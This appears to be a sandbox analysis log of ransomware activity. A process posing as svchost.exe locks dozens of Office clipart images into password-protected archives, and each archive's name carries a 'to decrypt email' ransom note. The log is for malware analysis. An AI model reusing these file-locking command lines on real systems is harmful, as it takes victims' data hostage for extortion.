  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:960
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2984
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2928
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1940
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2424
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2104
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1860
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1544
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1844
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2072
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:884
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1760
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2516
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386120.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386120.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2244
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1252
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2052
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2800
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1964
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2864
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2612
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2680
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2692
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387882.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387882.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:444
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2384
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2012
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:640
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:476
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:532
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:992
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2884
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH00780U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH00780U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3060
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01035U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01035U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2076
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:768
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2032
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1728
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01235U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01235U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1588
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:848
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:796
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01247U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01247U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2808
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01265U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01265U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1280
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01332U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01332U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2196
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01478U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01478U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1216
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01562U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01562U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2016
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:888
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2400
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1752
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02039U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02039U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2020
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02040U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02040U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1144
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1264
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02058U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02058U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2280
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1852
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2072
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2436
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1760
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02208U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02208U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2516
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02223U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02223U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2172
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02291U.BMP(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02291U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2824
